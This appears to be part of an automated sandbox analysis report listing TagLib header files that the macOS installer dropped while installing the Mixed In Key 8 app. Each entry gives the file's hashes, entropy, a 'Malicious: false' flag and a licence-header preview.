/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_t0oLZV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5949
Entropy (8bit):	4.4046817844078126
Encrypted:	false
SSDEEP:	96:kKxBsbA79uZGqu4WNmYsaLlMBT6AbVz/Bj7DUdLWzz0YVmqBVt:vMPkX4ImnaLaBT6AbVz/Bj7DUdLWzz0Y
MD5:	D4547BD09245EFC25D574022D8EC9728
SHA1:	E083C2AB272170ABE752D6C2D926B5BC1C9815CA
SHA-256:	657BEC982D0A246689E6CCBE18C2704426F01FBE75FD4E5D74D38179A0635C9C
SHA-512:	7EFBC75B75CE056C64928A308C04E9FF0F2EF5C45CF69A6D4BA57AC7C9A0CBB9A3A5B7F3A0C8DA7ADA71ECA858E87645B5DF0BBBE9D01E4E174D242B76A9560E
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org.. copyright : (C) 2006 by Aaron VonderHaar. email : avh4@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser Ge

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_tL2euY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3044
Entropy (8bit):	4.341833924797261
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLflFho2q2WKlQmJ4xXCShs/LG3V/1n6/UX:kob/Nq2Wwn4xXCSu63Vd6MX
MD5:	333718684CA3B56416EF83E6FA43E4B2
SHA1:	20F1BD136EA0220563FC9E5A73294684ECA082F9
SHA-256:	8C8A4F77D130814CD9EDB13F28F7490004996EEA3F20CACA6D2D5FC3CF506702
SHA-512:	546CFEC439125D4E0F8C7244088CD07ADD8D30CD6BCB4BC5535C0B4998AFF5EAA444899576C21BD6619FE62DDEC036AEF9D685995FEF0093F08E533F3108F545
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_tcgV8w Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6783
Entropy (8bit):	4.323733700297132
Encrypted:	false
SSDEEP:	192:ACXO4OHmzfFBKKq17m8PGhHGZYzJTDzJczmfdEfDq0/:ACb6/MhJrJg9
MD5:	5688F0F231B661D9F1E8FE8F0FBBD915
SHA1:	4CA4E58D3EFC9BE7BEC255E995178394D231E6D7
SHA-256:	3C980E66D6E3BEFBD3E962D738BEDAB6916E2B46804EE931A54306AEF84164D0
SHA-512:	8E7BB8FF49D81B412E5C79B7277C2433858A89BEEEAA8878C1849BC6E4E6EC1A5FAD9DD3859CB1594A9B6ABC8DBD04FA989D2B193A671A8E4FDF1664A58646F9
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_unwL7C Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4019
Entropy (8bit):	4.802242200269514
Encrypted:	false
SSDEEP:	96:NAbPfe/fYUFV5qZsOJaQBapaYrH2cw8FeZhzn6Y:2LfeYUL5qZsOJLBqlfwEChzn6Y
MD5:	E26416AC9EF68473422B94F064352C53
SHA1:	11E606A9B79D3750A02F87DDA4DEF5D995346405
SHA-256:	0A6F053041743797AF57A60A1CD951B2B568296768FE94FF45C3B0441B85D43C
SHA-512:	8AA1F1732DF180FED0437576414859A860743427B4503214C3B80E9C2E8FA90E6CD10E4AD2C5EBADD459BE28C50A0327E14B30A0C8F313967C0E1C570161A448
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_usKj2n Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6333
Entropy (8bit):	4.271153532802757
Encrypted:	false
SSDEEP:	192:iNYsfgBabi3EGZDwxjwt5T3QYiSlOZsBG1b2D93ElJDdXaTn8fzVUIaTIoREw8Z6:ig7ByU/c6
MD5:	5B6836226BA22DE96FD6C2F4E7B3A749
SHA1:	0D596D6B98D66CD6A3A896DA448BBB200B78DE69
SHA-256:	3B1899C07A3EA9D7CD332EBA1C0329F2903CA175B72F5245BE499D6FF761F92F
SHA-512:	46AFE604FD1EBC4520BDBE446E1A55E9C1852F340E16112CE79B622EF4DB4FE23EFD22C2978656D72D56FF379BCCAFACE90C420FF5C2CB266BD821C5CA7B6FE3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vZLnxf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	5037
Entropy (8bit):	4.281544831046047
Encrypted:	false
SSDEEP:	96:CH/bPQ94MG9z+shACUzQs6MA1UKq163QzJNWmzJpzMafFiE0g:WTaC9YFWKKq163QzJNWmzJpz7fEEB
MD5:	B33EBF6861E3AE3B17BC123726B3D27B
SHA1:	F3AE14BAA11292D16C29FD47E5944372F78DD733
SHA-256:	092E00732A0E294892AD599B6E0D60D10CCC3E071FBA8B66DD68CB8696D3B030
SHA-512:	F154571F83A283DD85246270E68A59D9802FCBB94456B0CD5B04479D431CACBB4A04F9DD5263E2B1759964EDD2DE4138CD65794F8BD5A99F73A9E101065CFA94
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vjdKpd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	7757
Entropy (8bit):	4.397981768682284
Encrypted:	false
SSDEEP:	192:mVPUxEWqVQqqSNY4bJRzbJ013Ofo8M5rDmodnyYmVjs2jYAf4:mdnJtJ48mrKoUJuB
MD5:	0DBB1F2897EB7196851B9E52473E3172
SHA1:	87433961CEF919B21D731E7EFAD1D17FE7C59512
SHA-256:	20257D4900283F1494215A8D41BDA1F3A4F0F1227771646693051AA97A751B66
SHA-512:	0312AC8ACBFC735A8104FB57FD188673C31B85B7F1E440FE66E86CF4E1B47A6F9434627578AE8D4037CEE71CDE1123C70ADB839A53AF8C389DC5D0E0ADC61A91
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wCObC3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5177
Entropy (8bit):	4.1399983791455
Encrypted:	false
SSDEEP:	96:9GbP62y3k7A6lk5AWaDQ2mTSB1m+usEqs+NOob8jSVknbViRC:Aj62y3k7A6i5AWcQfTSB1m+uhqhNOow7
MD5:	59FF34321095A27B24ABF8B96A676585
SHA1:	6B5CE73CA3FDF626783D5B5508676FD21691B492
SHA-256:	917AD62BD80A9311C344DA1F1750101B9CB1331A05B922C96A42BFB3681BCE23
SHA-512:	48F74299809800D05B0DD5F77C8CB95DB16588450E9841276A0C71AAE898C2B2C50487B56D0E5CAB8E5CA8E3D3C011D73122DB6CE30CB063AE2EDEDBF7B442FF
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wi9Mtm Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	9515
Entropy (8bit):	4.429449595136447
Encrypted:	false
SSDEEP:	192:LdtSg8EHmZVCmnlU6cyZWlsPaL36oBF2XJa0RHY841sK7x9PxsUTzz9Wfr0C2:LLYV51ONfzCI
MD5:	BDBB5C2ECA01519135AF3985A1941E69
SHA1:	36F5DACE6335B2A426D894C9E012E47BC8F4203B
SHA-256:	A9CB46B4EE94F8E52A46FBF16F25CBAFE892DCC16CE001BE613EBDDE09919A07
SHA-512:	1A80D95EEA3FCCFD6D84761A70A1B6E0E74F71C1C885D8518965DD202281E2605AD736FF388B234E965D5260924D0A75C3D9A4B3388729A41ECFAF1C52DA3FF6
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_y7fkag Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	3705
Entropy (8bit):	4.219968803127934
Encrypted:	false
SSDEEP:	48:x3TyBHbKjPOLAwXxDKuxKkZzC/mST/wee/rPa/p9/W+/+UZW/Rvj/Qx/XdG:xCbVw+ST4eezyR9++GUs5j4xFG
MD5:	8542EA6A18C10FFC6E320C06BFB1818C
SHA1:	1966F14671A575A6DE21F39975989C4ACA4126BD
SHA-256:	AF936448C63034D6AB30B463F8E056C93B57729DBC983B7ED5BDBEA890C336E8
SHA-512:	0B87589083972692972C21A40E000CAEBEA814557608B869641A7D9D46CFAF92DBAEDC0170A4BBED54CE0C8A750A6516F7D31BE38B562555975E1459EA098F5C
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_yR2VmY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4538
Entropy (8bit):	4.293781981962392
Encrypted:	false
SSDEEP:	96:QlbOPPvsP9ePapplMy46SdGRvYuvzM6BFjsb595bzg:WCPvsP9eSppay46SdGRvYuvzM6BFQbXq
MD5:	A8B6BFEA997501E6D40FC48850D11CDC
SHA1:	7B76B1BF403925C22EC4B8F478893FF833F27391
SHA-256:	93C96F053E0330E4EF29A2C3EB7BE8DA54A9A7D18C4F7B96D03ADBB60CE783B3
SHA-512:	8FAD9D29AE6BB34A3E965DE699DC168C1AE85A9666342FC695782F24E542135BD8073FA84CBBEB275F991804A84158469EE9FFB05483F470BA32AE2B5D7B7F91
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2012 by Rupert Daniel. email : rupert@cancelmonday.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ynOADn Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4251
Entropy (8bit):	4.162450657570428
Encrypted:	false
SSDEEP:	96:CH/bnQ+4yPctlk5AWaDQ2mTSBCNs1m+uM+PC:Wr94yPcti5AWcQfTSBys1m+uNPC
MD5:	EAC0CE122A38823099811F2F2A3DD40C
SHA1:	672D75FBD39FF435A61C67E4A481D5F01F70B77E
SHA-256:	741CDC094C0567F04DC4BFDF1338E375470FBC1A1FFAAA3BC485ECDFC57CFF76
SHA-512:	88C24C6357713F0977174B80F4C14E7008093258E72DDDCCE4FB6FD3E71A76FD59654EBDAB2D379B80BA7D46E85841D1F78965168087FD59D82EBF6C8EABCF78
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zJqDpl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3599
Entropy (8bit):	4.335073814210081
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLGVtbjlc/oRLaGulU/ocRdc/otXE5/fkde/8XkdUGkD/ohPMmzX:kobWPWm0lUQidcsw39QTDcX
MD5:	FC3B069583610C00A2DCD395A2986CC1
SHA1:	A144D4656A2C0AFBFDD8F410191443BFABD62FF2
SHA-256:	6355A3672309B75D8096A0334071E780EFF80F5483E918AD9B7A6DC16126D7DC
SHA-512:	DCCAFAF043A39125B41C61FD08D204E0FDCE9B28199F3CF479C274E718C691D971098C226EFE8D08ACC33AB06D61D8A8858F847014DEA181B264322F76B9A179
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zNZgBS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	5269
Entropy (8bit):	4.282530748384306
Encrypted:	false
SSDEEP:	96:fCbroZEEENv9IxUwLbm+lMpw+ST4eezyR9++GUsCcueoDtjORmMG:KvoZEEEF9IxUwLbm+apw+84XzyR9++Gs
MD5:	2445B0A766043A90A74921E5778937AD
SHA1:	84A4C471BDF5CA42C9D7A32E960DFF3439307756
SHA-256:	85B25F4ACA713F0BE2FD7EC4FDEAAF991417CF76A6DE96AED2286D4DE4FF853E
SHA-512:	071E64C8269B7DF90E8B3A498CE150B1447C29B4C3F82455D382B4CF5CA199DD5C2838B195618405B82D91249D18C15F1D00189E51FD02CD3904D54138735F9D
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2005-2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zSSGb6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3031
Entropy (8bit):	4.221743986397928
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLCtFSGMVUEuyQ1XTShh/2V/lVv/ezN/sBO:kobsPWQ1gheVXvGzNx
MD5:	ED0BE593364765AB6C7703E7FD960D26
SHA1:	62ACBB252C253A999A5A78A81849D209DE199969
SHA-256:	4BD358E99E3A181F5889BC3B41D4D67D3CB2DC741F0216C027E2A2BADBDD9273
SHA-512:	3294BAECE0CE391E0B439DED64012D53E0A45855E4AAF0B7DA707752D1CC0FB9211346D8EE1F2C129857D605DE7E9474229B35646C72E9DF75BA469FBF8EFD00
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zUlkBh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2701
Entropy (8bit):	4.384408152950914
Encrypted:	false
SSDEEP:	24:8SWHjN57bfy9lOkHYg/TbVI2+RymPOFesTBtejqN8AEnM+M0APPCU3Hit6BowilO:KnTyBHbKjPOLTnq5UCIFsvLG
MD5:	D55EE334F0B48B04A3C65EBDA66803FF
SHA1:	E1678014023E0E690F225CA78A190CC6BF81ACFB
SHA-256:	6455E55ECCC5E72EF87E5887D150A89DC1FF2B9DB58612CCA055D8B58087AF74
SHA-512:	56311A8483B33EC9B5FED04295D80FE23944659A4BE503F0E919784E33DFDDBDD8A19EBF2CE2410BE2A0E32AD8964BB7CB6F9C6C895B3C9D44430D0680C412AF
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zxdiwF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	4.324003047484079
Encrypted:	false
SSDEEP:	24:kDB7bfy9lOkHYg/TbVI2+RymPOFesuqfqXJaH4njo0jPB:ktTyBHbKjPOLVfiEH8xbB
MD5:	2DF04427E326351DCABACCC9D5D0B328
SHA1:	F86E5B04F726D1B2BCFEBF0B17D0AB8000D1497B
SHA-256:	B65ABEC6E40EA460228BB55DBD30721CA65371324C557FDE00ED12C67120038C
SHA-512:	66F4353A2DC2897491951F6A27BCF9C26482285BF96CAFAC74611DF1574A58409602DEE6D8C5E25D4294C1A8C5E72DC11D30B5842786654573D38757159A0D1B
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_G9QCqh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2192
Entropy (8bit):	4.127547095235431
Encrypted:	false
SSDEEP:	24:SRz7bfy9lOkHYg/TbVI2+RymPOFesLe5K0nMJJ/zScH/Wa:SlTyBHbKjPOLAqJ/zSK/Wa
MD5:	AD85CCF53957F05ACFE7C52DD24A8F11
SHA1:	A0D628BF97B5475A5C2CA5204EAD8B69410FB60E
SHA-256:	6C8F6578CA0A6ADF925B579FDC5D83B86E46852C4E6440A2EAFADCC137E654DA
SHA-512:	FA99C499DD6E65CB4D0ABDC57AC64BFB2ECF400E0017923937E8C4F9F2DF2BCDF84DA79412CB031E687BC668739E1788D809D408DC8AB76D65771897CAEE902C
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2016 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_Xhev1o Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2086
Entropy (8bit):	4.1256225185777495
Encrypted:	false
SSDEEP:	24:/TRz7bfy9lOkHYg/TbVI2+RymPOFesb0w0naMa7WMl3MlsON:/TlTyBHbKjPOLQu7Ll8lsq
MD5:	BFB0B1A0E0B736889326EA84D8BC3E59
SHA1:	9E023DA208DA0057743351ACF7C288516E0F0296
SHA-256:	4893CC4187743DC151C00D2CB5DF0B15CCB80528D23177F2690EC5C1E29A488C
SHA-512:	782EDACDF3A4CCF2D274F6C7BC62C798F87A64EAB7F3F0860521A906E643264318A05810D745BD7B5D1CB3C3D9A24A01DB6004AD674AE50BD62C1EAACCAF9DF1
Malicious:	false
